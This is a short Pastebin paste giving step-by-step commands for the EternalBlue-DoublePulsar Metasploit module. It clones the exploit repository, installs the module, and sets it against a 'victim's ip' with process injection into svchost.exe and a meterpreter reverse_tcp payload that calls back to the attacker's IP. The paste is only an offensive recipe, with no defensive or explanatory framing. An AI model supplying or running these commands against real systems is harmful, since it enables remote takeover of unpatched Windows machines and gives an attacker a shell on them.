Advertisement
Guest User

Untitled

a guest
Jun 26th, 2019
94
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.38 KB | None | 0 0
  1. git clone https://github.com/ElevenPaths/Eterna...
  2. cd Eternalblue-Doublepulsar-Metasploit
  3. mv eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb msfconsole
  4. use exploit/windows/smb/eternalblue_doublepulsar
  5. set rhost victim's ip
  6. set PROCESSINJECT svchost.exe (set target 8)
  7.  
  8. set payload windows/meterpreter/reverse_tcp
  9. set lhost your ip exploit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement